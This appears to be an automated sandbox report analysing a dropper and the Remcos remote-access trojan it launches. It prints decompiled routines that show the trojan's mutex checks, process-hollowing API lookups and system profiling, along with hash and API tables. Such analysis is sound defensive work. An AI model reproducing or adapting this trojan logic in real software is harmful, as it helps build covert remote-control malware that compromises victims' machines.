                                                                                                • Instruction ID: 7caba3df236cbd3b5aee00600639f3ff681219595ace79f71672144861f238f5
                                                                                                • Opcode Fuzzy Hash: 7e254487deaec9efa6a3ad592be75035e80c793dc607b113ef645581cbecb3ef
                                                                                                • Instruction Fuzzy Hash: 86F0A4B2640105ABD704DFDCDC51FFB776DAB48740F04841CFA158B281E671EA5087B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA87E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA87E0(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
				void* _t21;
				void* _t22;

				0x6eda0000("pStubMsg %p, pMemory %p, type 0x%02x\n", _a4, _a8,  *_a12 & 0x000000ff);
				_t22 = _t21 + 0x10;
				if(( *_a12 & 0x000000ff) != 0x30) {
					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
					_t22 = _t22 + 8;
					__imp__RpcRaiseException(0x6e6);
				}
				E6EDA73B0(_a4 + 0x14, 4);
				return E6EDAAF50(_a4, 0x14);
			}





                                                                                                0x6eda87f7
                                                                                                0x6eda87fc
                                                                                                0x6eda8808
                                                                                                0x6eda8816
                                                                                                0x6eda881b
                                                                                                0x6eda8823
                                                                                                0x6eda8823
                                                                                                0x6eda8832
                                                                                                0x6eda8849

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA8823
                                                                                                Strings
                                                                                                • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6EDA87F2
                                                                                                • invalid format type %x, xrefs: 6EDA8811
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                                • API String ID: 3997070919-1092843490
                                                                                                • Opcode ID: 2002dbde3d4f4494b86a9d2d13b8aba7a4f5a48145a7150bfdda8c43e904291a
                                                                                                • Instruction ID: 7b2b3d10b4c6e197d525303e56b5556a36e33c541f1352b17444650188783777
                                                                                                • Opcode Fuzzy Hash: 2002dbde3d4f4494b86a9d2d13b8aba7a4f5a48145a7150bfdda8c43e904291a
                                                                                                • Instruction Fuzzy Hash: C7F096F5504284ABDB00CFE8EC51EAE376D5F9564AF048445FF584F285E631E62087B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f78 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nszE2AE.tmp\sozz.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                0x004024b0
                                                                                                0x004024b0
                                                                                                0x004024b3
                                                                                                0x004024ce
                                                                                                0x004024b5
                                                                                                0x004024b7
                                                                                                0x004024bc
                                                                                                0x004024c3
                                                                                                0x004024d5
                                                                                                0x0040264e
                                                                                                0x0040264e
                                                                                                0x004024db
                                                                                                0x004024ed
                                                                                                0x004015a6
                                                                                                0x004015a8
                                                                                                0x00000000
                                                                                                0x004015ae
                                                                                                0x004015a8
                                                                                                0x00402880
                                                                                                0x0040288c

                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                                                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll, xrefs: 004024BC, 004024E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: FileWritelstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll
                                                                                                • API String ID: 427699356-647133380
                                                                                                • Opcode ID: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                                                                                • Instruction ID: 2b901ff19b85a4e76c04b2b8852d4c7aed572531c5b12b0aefee0adfe1f835b5
                                                                                                • Opcode Fuzzy Hash: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                                                                                • Instruction Fuzzy Hash: 7EF0E9B2A54240BFDB00EBB19D49EAB76589B00344F20443BB142F50C2D6BC8D819B2D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405465, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00405465(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                0x00405466
                                                                                                0x00405470
                                                                                                0x00405472
                                                                                                0x00405479
                                                                                                0x00405481
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405481
                                                                                                0x00405483
                                                                                                0x00405488

                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xxTzyGLZx5.exe,C:\Users\user\Desktop\xxTzyGLZx5.exe,80000000,00000003), ref: 0040546B
                                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xxTzyGLZx5.exe,C:\Users\user\Desktop\xxTzyGLZx5.exe,80000000,00000003), ref: 00405479
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrlen
                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                • API String ID: 2709904686-224404859
                                                                                                • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                • Instruction ID: d448c4330aaee4e1d52c8fc1992275a879f371812311106428750dc828cdcd14
                                                                                                • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                • Instruction Fuzzy Hash: 6CD09EA241D9A06EE30256149C04B9F6A48DB16711F194462E580A6191C2785D818BA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405577, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00405577(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                0x00405583
                                                                                                0x00405585
                                                                                                0x004055ad
                                                                                                0x00405592
                                                                                                0x00405597
                                                                                                0x004055a2
                                                                                                0x00000000
                                                                                                0x004055bf
                                                                                                0x004055ab
                                                                                                0x004055ab
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                                                                                                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004055A5
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                • Instruction ID: 67566e0cb393ef72fa6fa9f0f91681af9918d2384c5fdc364e409a19ee530f2a
                                                                                                • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                • Instruction Fuzzy Hash: D2F0A73620AD51EBD2025B255C04E6B7A99EF91324B14057AF440F2144D3399C529BBB
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Analysis Process: xxTzyGLZx5.exe PID: 7008 Parent PID: 6780 xxTzyGLZx5.exeCOMMON

                                                                                                Executed Functions

                                                                                                Function 0040104C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.682805273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: #100
                                                                                                • String ID: VB5!6&*
                                                                                                • API String ID: 1341478452-3593831657
                                                                                                • Opcode ID: 3cdc8536199cd560e2627349f8158df96f2d3e5b25d6b8b93e5c5f73a6db8eeb
                                                                                                • Instruction ID: a12084c55d1ffc36602276b3cafedaf3d59f71825310c224ab85d25d8918c0d8
                                                                                                • Opcode Fuzzy Hash: 3cdc8536199cd560e2627349f8158df96f2d3e5b25d6b8b93e5c5f73a6db8eeb
                                                                                                • Instruction Fuzzy Hash: F1D0A44004E3C40ED30756B60DA56862F70090325031A00EBC5C0EE4E3805C09888336
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Analysis Process: rem9090sta.exe PID: 7136 Parent PID: 7008 rem9090sta.exeCOMMON

                                                                                                Executed Functions

                                                                                                Function 0040CD53, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0040CD53() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x46dd20 = _t2;
				if(_t2 == 0) {
					 *0x46dd20 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46dd10 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46dd20 == 0) {
					 *0x46dd10 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46dd18 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x46dd04 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46dea0 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46dea4 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46dd14 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				 *0x46dd08 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46dd24 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46dd28 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46dd0c = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46dd00 = _t24;
				return _t24;
			}






                                                                                                0x0040cd66
                                                                                                0x0040cd6f
                                                                                                0x0040cd77
                                                                                                0x0040cd7e
                                                                                                0x0040cd8f
                                                                                                0x0040cd8f
                                                                                                0x0040cdaa
                                                                                                0x0040cdaf
                                                                                                0x0040cdc0
                                                                                                0x0040cdc0
                                                                                                0x0040cdde
                                                                                                0x0040cdf2
                                                                                                0x0040ce06
                                                                                                0x0040ce1a
                                                                                                0x0040ce2e
                                                                                                0x0040ce42
                                                                                                0x0040ce56
                                                                                                0x0040ce6a
                                                                                                0x0040ce7b
                                                                                                0x0040ce83
                                                                                                0x0040ce87
                                                                                                0x0040ce8d

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Remcos-36FQQT,00000001,0040C529), ref: 0040CD66
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CD6F
                                                                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD8A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CD8D
                                                                                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD9E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CDA1
                                                                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CDBB
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CDBE
                                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CDCF
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CDD2
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CDE3
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CDE6
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDF7
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CDFA
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CE0B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE0E
                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CE1F
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE22
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CE33
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE36
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CE47
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE4A
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE5B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE5E
                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE6F
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE72
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE80
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE83
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$HandleModule$LibraryLoad
                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$Remcos-36FQQT$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                                                                                                • API String ID: 551388010-3591396675
                                                                                                • Opcode ID: c5626f2b3a28c6ef4ff25d452c6b5778089f0bbe27d038e7decbb45542a80569
                                                                                                • Instruction ID: 33ca1cab84305e69b6140a5408ccbf0a85d6502d9941ea4c4e27b2a55a14a1c2
                                                                                                • Opcode Fuzzy Hash: c5626f2b3a28c6ef4ff25d452c6b5778089f0bbe27d038e7decbb45542a80569
                                                                                                • Instruction Fuzzy Hash: AE21C1A4F8035879D7107BB69C4AE167E98DAD4B553280937F006971B0FBFC84008E5F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040C2E2, Relevance: 67.3, APIs: 15, Strings: 23, Instructions: 784synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 89%
                                                                                                			E0040C2E2(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t71;
				void* _t78;
				void** _t86;
				void* _t90;
				CHAR* _t93;
				long _t95;
				int _t97;
				char _t100;
				void* _t101;
				void* _t105;
				void* _t121;
				void* _t122;
				void* _t129;
				char _t135;
				char* _t140;
				signed char* _t142;
				signed char* _t144;
				void* _t147;
				void* _t149;
				void* _t166;
				intOrPtr _t168;
				void* _t169;
				intOrPtr _t185;
				intOrPtr* _t188;
				void* _t190;
				void* _t196;
				char* _t199;
				void* _t202;
				char* _t206;
				void* _t213;
				signed short* _t217;
				void* _t218;
				void* _t219;
				signed int _t220;
				CHAR* _t227;
				void* _t229;
				char* _t232;
				char* _t234;
				intOrPtr* _t236;
				void* _t238;
				intOrPtr* _t243;
				intOrPtr* _t247;
				void* _t249;
				void* _t250;
				void* _t257;
				void* _t268;
				void* _t271;
				struct _SECURITY_ATTRIBUTES* _t272;
				int _t275;
				char* _t365;
				signed int _t387;
				signed int _t391;
				int _t393;
				signed int _t399;
				signed int _t402;
				intOrPtr _t428;
				void* _t438;
				void* _t440;
				signed int _t457;
				void* _t460;
				char* _t466;
				void* _t467;
				char* _t470;
				void* _t472;
				void* _t477;
				char* _t482;
				intOrPtr* _t486;
				void* _t489;
				void* _t490;
				void* _t491;
				signed int _t497;
				void* _t500;
				void* _t501;
				void* _t502;
				void* _t504;
				void* _t506;
				void* _t507;
				void* _t508;
				void* _t509;
				void* _t510;
				void* _t514;

				_t449 = __edx;
				 *0x46dd1c = _a4;
				_push(_t271);
				E0040CC9F( &_v724, __edx, __eflags); // executed
				_t500 = (_t497 & 0xfffffff8) - 0x2f4;
				E004020DE(_t271, _t500, __edx, __eflags, 0x46e620);
				_t501 = _t500 - 0x18;
				E004020DE(_t271, _t501, __edx, __eflags,  &_v728);
				_t71 = E00417E68( &_v756, __edx);
				_t502 = _t501 + 0x30;
				E0040D4A2(__edx, _t71);
				E00401E66( &_v760, __edx);
				_t287 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t466 = 0x46e3a4;
					__eflags =  *((char*)(E00401F87(E00401E3B(0x46e3a4, _t449, __eflags, 3))));
					 *0x46daf5 = __eflags != 0;
					_t78 = E004076BB(_t271,  &_v756, E00405416( &_v780, "Software\\", __eflags, E00401E3B(0x46e3a4, _t449, __eflags, 0xe)), 0x46e3a4, __eflags, "\\");
					_t476 = 0x46e5a8;
					E00401FC3(0x46e5a8, _t77, 0x46e5a8, _t78);
					E00401FB9();
					E00401FB9();
					E00405BB7(_t271, 0x46e650, "Exe");
					_t272 = 0;
					E00401E3B(0x46e3a4, _t77, __eflags, 0x32);
					__eflags =  *(E004052CF(0));
					 *0x46dd42 = __eflags != 0;
					E00401E3B(0x46e3a4, _t77, __eflags, 0x33);
					_t86 = E004052CF(0);
					__eflags =  *_t86;
					 *0x46dd43 =  *_t86 != 0;
					__eflags =  *0x46dd42 - _t272; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t272;
						_t477 = OpenMutexA(0x100000, _t272, "Remcos_Mutex_Inj");
						__eflags = _t477;
						if(_t477 != 0) {
							WaitForSingleObject(_t477, 0xea60);
							CloseHandle(_t477);
						}
						_t452 = E00401F87(0x46e5a8); // executed
						_t90 = E004108B4(_t89, "Inj",  &_v776); // executed
						__eflags = _t90;
						if(__eflags != 0) {
							_t452 = E00401F87(0x46e5a8);
							E00410D11(_t262, __eflags, "Inj");
						}
						E00401F9F(0x46e5d8, E00401E3B(_t466, _t452, __eflags, 0xe));
						_t93 = E00401F87(0x46e5d8);
						_t467 = 0;
						_t275 = 1;
						CreateMutexA(0, 1, _t93); // executed
						_t95 = GetLastError();
						__eflags = _t95 - 0xb7;
						if(_t95 == 0xb7) {
							L45:
							E00401FB9();
							_t97 = _t275;
							goto L5;
						} else {
							E0040CD53();
							GetModuleFileNameW(0, "C:\Users\jones\AppData\Local\Temp\rem9090sta.exe", 0x104);
							_t100 = E00418004(0x46e5d8);
							_push(0x46e5d8);
							_t453 = 0x80000002;
							 *0x46dea8 = _t100;
							_t101 = E00410911( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
							_t504 = _t502 + 0xc;
							E00401FC3(0x46e638, 0x80000002, 0x46e638, _t101);
							E00401FB9();
							__eflags =  *0x46dea8;
							if( *0x46dea8 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							E00405479(_t275, 0x46e638, _t467);
							_t105 =  *0x46dd14;
							__eflags = _t105;
							if(_t105 != 0) {
								 *0x46c9c0 =  *_t105();
							}
							_t482 = 0x46e3a4;
							__eflags = _v776 - _t467;
							if(__eflags == 0) {
								_t438 = E00401E3B(0x46e3a4, _t453, __eflags, 0x2e);
								__eflags =  *((char*)(E00401F87(_t438)));
								if(__eflags != 0) {
									__eflags =  *0x46dd14 - _t467; // 0x7536e630
									if(__eflags != 0) {
										__eflags =  *0x46c9c0 - _t467; // 0x1
										if(__eflags == 0) {
											_t453 = E00401F87(0x46e5a8);
											_t257 = E0041086A(0x46e5a8, _t256, "origmsc");
											_pop(_t440);
											__eflags = _t257;
											if(__eflags == 0) {
												E00406114(_t275, _t440, _t453);
											}
										} else {
											_push(_t438);
											_push(_t438);
											__eflags = E0040A748() - 0xffffffff;
											if(__eflags == 0) {
												E0040620E(__eflags); // executed
											}
										}
									}
								}
							}
							__eflags =  *((char*)(E00401F87(E00401E3B(_t482, _t453, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D441(); // executed
							}
							E00409DFE(_t275, 0x46e578, E00401F87(E00401E3B(_t482, _t453, __eflags, 0xb)));
							__eflags =  *((char*)(E00401F87(E00401E3B(_t482, _t453, __eflags, 4))));
							 *0x46daf6 = __eflags != 0;
							__eflags =  *((char*)(E00401F87(E00401E3B(_t482, _t453, __eflags, 5))));
							 *0x46daef = __eflags != 0;
							__eflags =  *((char*)(E00401F87(E00401E3B(_t482, _t453, __eflags, 8))));
							 *0x46daf4 = __eflags != 0;
							__eflags =  *((char*)(E00401F87(E00401E3B(_t482, _t453, __eflags, 3))));
							if(__eflags != 0) {
								_t243 = E00401F87(E00401E3B(_t482, _t453, __eflags, 0x30));
								_t25 = _t243 + 2; // 0x2
								_t453 = _t25;
								do {
									_t428 =  *_t243;
									_t243 = _t243 + 2;
									__eflags = _t428 - _t467;
								} while (_t428 != _t467);
								__eflags = _t243 - _t453;
								if(__eflags != 0) {
									_t247 = E00401F87(E00401E3B(_t482, _t453, __eflags, 9));
									_t249 = E00401F87(E00401E3B(0x46e3a4, _t453, __eflags, 0x30));
									_t453 =  *_t247;
									_t250 = E00418A4B( &_v780,  *_t247, _t249); // executed
									E00401EEC(0x46e5c0,  *_t247, _t247, _t250);
									E00401EE2();
									_t482 = 0x46e3a4;
								}
							}
							__eflags = _v776 - _t467;
							if(_v776 != _t467) {
								E00432D80(_t467,  &_v524, _t467, 0x208);
								_t121 = E0040247B();
								_t122 = E00401F87(0x46e5f0);
								_t454 = E00401F87(0x46e5a8);
								E00410A5F(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
								_t506 = _t504 + 0x20;
								E00409DFE(_t275, 0x46e590,  &_v524);
								_t470 = 0x46e3a4;
								goto L47;
							} else {
								__eflags =  *0x46daf5;
								if(__eflags == 0) {
									E00409DFE(_t275, 0x46e590, "C:\Users\jones\AppData\Local\Temp\rem9090sta.exe");
								} else {
									_t232 = E00401F87(E00401E3B(_t482, _t453, __eflags, 0x1e));
									_t234 = E00401F87(E00401E3B(_t482, _t453, __eflags, 0xc));
									_t236 = E00401F87(E00401E3B(0x46e3a4, _t453, __eflags, 9));
									__eflags =  *_t232;
									__eflags =  *_t234;
									_t482 = 0x46e3a4;
									_t238 = E00401F87(E00401E3B(0x46e3a4, _t453,  *_t234, 0xa));
									E0040A9AB( *_t236, E00401F87(E00401E3B(0x46e3a4, _t453, __eflags, 0x30)), _t238, ((_t235 & 0xffffff00 |  *_t232 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t235 & 0xffffff00 |  *_t232 != 0x00000000) & 0x000000ff); // executed
									_t504 = _t504 + 0xc;
									_t275 = 1;
									_t467 = 0;
								}
								_t213 = E0040247B();
								_t457 = 2;
								_t399 =  ~(0 | __eflags > 0x00000000) | (_t213 + 0x00000001) * _t457;
								_push(_t399);
								_v780 = _t399;
								_t491 = E0043021B(_t399, (_t213 + 1) * _t457 >> 0x20, _t482, __eflags);
								__eflags = _t491;
								if(_t491 == 0) {
									_t491 = _t467;
								} else {
									E00432D80(_t467, _t491, _t467, _v780);
									_t504 = _t504 + 0xc;
								}
								_t217 = E00401EDD(0x46e590);
								_t460 = _t491 - _t217;
								__eflags = _t460;
								_t472 = 2;
								do {
									_t402 =  *_t217 & 0x0000ffff;
